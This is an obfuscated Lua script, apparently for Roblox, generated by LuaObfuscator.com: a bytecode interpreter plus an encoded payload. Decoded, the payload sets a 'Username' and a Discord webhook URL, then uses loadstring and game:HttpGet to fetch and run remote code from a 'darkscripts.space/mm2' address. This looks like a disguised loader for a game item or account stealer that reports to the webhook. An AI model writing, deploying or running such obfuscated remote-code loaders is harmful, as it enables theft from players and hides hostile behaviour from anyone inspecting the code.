--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v108=v5(v82,v19);v19=nil;return v108;else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-((2 + 0) -1))))%((621 -(555 + 64))^(((v33-(1 + 0 + 0)) -(v32-(1 -0))) + (932 -((1814 -(892 + 65)) + (176 -102))))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=(3 -1)^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (4 -(120 -(32 + 85)))) or 0 ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==((259 + 92) -((345 -258) + 263))) then return v35;end if (v34==(180 -((1019 -(802 + 150)) + 113))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=2 -(2 -1) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;return (v37 * (1253 -(915 + 82))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (8 -5) );v18=v18 + 4 ;return (v41 * (9773502 + 7003714)) + (v40 * (86188 -20652)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1188 -(1069 + 118) ;local v45=(v20(v43,2 -1 ,43 -23 ) * ((1 + 0 + 1)^((46 + 10) -24))) + v42 ;local v46=v20(v43,793 -(201 + 571) ,31);local v47=((v20(v43,32 + 0 )==(792 -(368 + 423))) and  -(3 -2)) or (19 -(10 + 8)) ;if (v46==(0 -0)) then if (v45==(442 -(416 + 26))) then return v47 * 0 ;else v46=3 -(1140 -(116 + 1022)) ;v44=0;end elseif (v46==(879 + 1168)) then return ((v45==(0 -0)) and (v47 * ((439 -(145 + 293))/0))) or (v47 * NaN) ;end return v8(v47,v46-(1453 -(44 + 386)) ) * (v44 + (v45/(2^(1538 -(998 + (2031 -1543)))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v65=3 -2 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51==(1 + 2)) then for v91= #"|",v23() do local v92=(function() return v21();end)();if (v20(v92, #"\\", #"\\")~=(0 + 0)) then else local v102=(function() return 0 + 0 ;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v102==(2 + 0)) then while true do if (v103~= #"!") then else local v164=(function() return 0;end)();local v165=(function() return;end)();while true do if (v164~=0) then else v165=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v165) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==0) then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==0) then v178=(function() return 0 + 0 ;end)();while true do if (v178~=(0 + 0)) then else v106[ #"asd"]=(function() return v22();end)();v106[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v104== #"~") then v106[ #"asd"]=(function() return v23();end)();elseif (v104==(398 -(115 + 281))) then v106[ #"xnx"]=(function() return v23() -((4 -2)^16) ;end)();elseif (v104== #"-19") then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==0) then v184=(function() return 0 + 0 ;end)();while true do if (v184~=(0 -0)) then else v106[ #"asd"]=(function() return v23() -(2^16) ;end)();v106[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v165=(function() return 1;end)();end if (1==v165) then v103=(function() return 2;end)();break;end end break;end end end if (v103~= #"xxx") then else if (v20(v105, #"91(", #"19(")== #"<") then v106[ #"xnxx"]=(function() return v58[v106[ #"0313"]];end)();end v53[v91]=(function() return v106;end)();break;end if (v103~=2) then else local v167=(function() return 0;end)();while true do if (v167==1) then v103=(function() return  #"19(";end)();break;end if (v167==0) then if (v20(v105, #"}", #"{")== #"}") then v106[7 -5 ]=(function() return v58[v106[869 -(550 + 317) ]];end)();end if (v20(v105,2 -0 ,2 -0 )== #",") then v106[ #"xnx"]=(function() return v58[v106[ #"19("]];end)();end v167=(function() return 2 -1 ;end)();end end end if (v103==0) then local v168=(function() return 285 -(134 + 151) ;end)();local v169=(function() return;end)();while true do if (0==v168) then v169=(function() return 1665 -(970 + 695) ;end)();while true do if (v169==(1 -0)) then v103=(function() return  #"/";end)();break;end if (v169~=(1990 -(582 + 1408))) then else v104=(function() return v20(v92,2, #"xxx");end)();v105=(function() return v20(v92, #"xnxx",6);end)();v169=(function() return 1;end)();end end break;end end end end break;end if (v102==(3 -2)) then v105=(function() return nil;end)();v106=(function() return nil;end)();v102=(function() return 2 -0 ;end)();end if (v102==0) then local v151=(function() return 0 -0 ;end)();while true do if (v151~=0) then else v103=(function() return 1824 -(1195 + 629) ;end)();v104=(function() return nil;end)();v151=(function() return 1;end)();end if (v151==1) then v102=(function() return 1 -0 ;end)();break;end end end end end end for v93= #"}",v23() do v54,v93,v28=(function() return v52(v54,v93,v28);end)();end return v56;end if (v51==0) then v52=(function() return function(v98,v99,v100) local v101=(function() return 241 -(187 + 54) ;end)();while true do if (v101~=(780 -(162 + 618))) then else local v113=(function() return 0;end)();local v114=(function() return;end)();while true do if (v113==(0 + 0)) then v114=(function() return 0;end)();while true do if (v114==(0 + 0)) then local v173=(function() return 0 -0 ;end)();while true do if (v173==0) then v98[v99-#"~" ]=(function() return v100();end)();return v98,v99,v100;end end end end break;end end end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v51=(function() return 1 -0 ;end)();end if (v51==1) then local v89=(function() return 0 + 0 ;end)();while true do if (v89==0) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v89=(function() return 1;end)();end if (v89==(1001 -(451 + 549))) then v57=(function() return v23();end)();v51=(function() return 1 + 1 ;end)();break;end end end if (v51==(2 -0)) then local v90=(function() return 0 -0 ;end)();while true do if (v90~=0) then else v58=(function() return {};end)();for v109= #"!",v57 do local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v110~=1) then else if (v111== #"[") then v112=(function() return v21()~=0 ;end)();elseif (v111==(1386 -(746 + 638))) then v112=(function() return v24();end)();elseif (v111== #"91(") then v112=(function() return v25();end)();end v58[v109]=(function() return v112;end)();break;end if (v110==0) then local v158=(function() return 0 + 0 ;end)();while true do if (v158==(1 -0)) then v110=(function() return 1;end)();break;end if (0==v158) then v111=(function() return v21();end)();v112=(function() return nil;end)();v158=(function() return 342 -(218 + 123) ;end)();end end end end end v90=(function() return 1;end)();end if (v90~=1) then else v56[ #"xxx"]=(function() return v21();end)();v51=(function() return 1584 -(1535 + 46) ;end)();break;end end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1 + 1 ];local v64=v59[563 -(306 + 254) ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1 + 0 ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -(1 + (0 -0)) ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + (2 -(1203 -(373 + 829))) ];else v77[v86]=v74[v86 + (1 -0) ];end end local v78=(v75-v69) + (66 -(30 + 35)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[(1335 -(476 + 255)) -(268 + 335) ];if (v80<=(1260 -(1043 + 214))) then if (v80<=(291 -(60 + 230))) then if ((4844>2253) and (v80>(572 -(426 + 146)))) then local v115=v79[1 + 1 ];v77[v115]=v77[v115](v13(v77,v115 + (2 -1) ,v72));else v77[v79[1458 -(282 + 1174) ]]=v79[323 -(53 + 267) ];end elseif ((452==452) and (v80>(813 -(569 + 242)))) then v77[v79[(1135 -(369 + 761)) -3 ]]=v61[v79[3]];else local v121=v79[984 -(18 + 964) ];local v122,v123=v70(v77[v121](v13(v77,v121 + 1 + 0 ,v79[2 + 1 ])));v72=(v123 + v121) -((593 + 432) -(706 + 318)) ;local v124=1251 -(721 + 530) ;for v152=v121,v72 do local v153=1271 -(945 + (591 -265)) ;while true do if ((v153==(0 -0)) or (4557<2087)) then v124=v124 + 1 + 0 ;v77[v152]=v122[v124];break;end end end end elseif ((3874==3874) and (v80<=(705 -(271 + 429)))) then if ((v80>(4 + 0)) or (1938>4935)) then v61[v79[1 + 2 ]]=v77[v79[1502 -(1408 + (173 -81)) ]];else local v127;local v128,v129;local v130;local v131;v77[v79[1 + (239 -(64 + 174)) ]]=v79[1089 -(461 + 625) ];v71=v71 + (1289 -(993 + 295)) ;v79=v67[v71];v61[v79[1 + 2 ]]=v77[v79[1173 -(418 + 108 + 645) ]];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[1553 -(1126 + 425) ]]=v79[3];v71=v71 + 1 + 0 ;v79=v67[v71];v61[v79[408 -(118 + 287) ]]=v77[v79[1 + 1 ]];v71=v71 + (1122 -(118 + 1003)) ;v79=v67[v71];v77[v79[1 + 1 ]]=v61[v79[532 -(406 + 123) ]];v71=v71 + (1770 -(1749 + (29 -9))) ;v79=v67[v71];v77[v79[1 + 1 ]]=v61[v79[1 + 2 ]];v71=v71 + 1 ;v79=v67[v71];v131=v79[(1315 -(144 + 192)) -((769 -(42 + 174)) + 424) ];v130=v77[v79[1325 -(1249 + 73) ]];v77[v131 + 1 + 0 ]=v130;v77[v131]=v130[v79[1149 -(466 + 679) ]];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[5 -(3 + 0) ]]=v79[1903 -(106 + 1794) ];v71=v71 + 1 + 0 ;v79=v67[v71];v131=v79[2];v128,v129=v70(v77[v131](v13(v77,v131 + 1 + 0 + 0 ,v79[1 + 2 ])));v72=(v129 + v131) -1 ;v127=0;for v154=v131,v72 do v127=v127 + (2 -(1 + 0)) ;v77[v154]=v128[v127];end v71=v71 + 1 ;v79=v67[v71];v131=v79[(1509 -(363 + 1141)) -3 ];v77[v131]=v77[v131](v13(v77,v131 + (2 -1) ,v72));end elseif ((v80<=(16 -(1590 -(1183 + 397)))) or (4255<3423)) then do return;end elseif ((1454<=2491) and (v80>((368 -247) -(4 + 110)))) then v77[v79[586 -(57 + 527) ]]();else local v159=v79[1429 -(41 + 1386) ];local v160=v77[v79[106 -(17 + 64 + 22) ]];v77[v159 + 1 + 0 ]=v160;v77[v159]=v160[v79[8 -4 ]];end v71=v71 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083O0003083O00557365726E616D65030B3O0062696C616C322O3031323903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31324O3831392O3336382O3935303230382F6D676E72746E44772O6E75703835327536567A304B5443614F304D787A37305A68355031534656715868334D30394438345762797A305156465F2O6C4B49456A56695465030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F6461726B736372697074732E73706163652F2O6D32000C3O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00053O00122O000100063O00202O00010001000700122O000300086O000100039O0000022O00083O000100012O00063O00017O00",v9(),...);
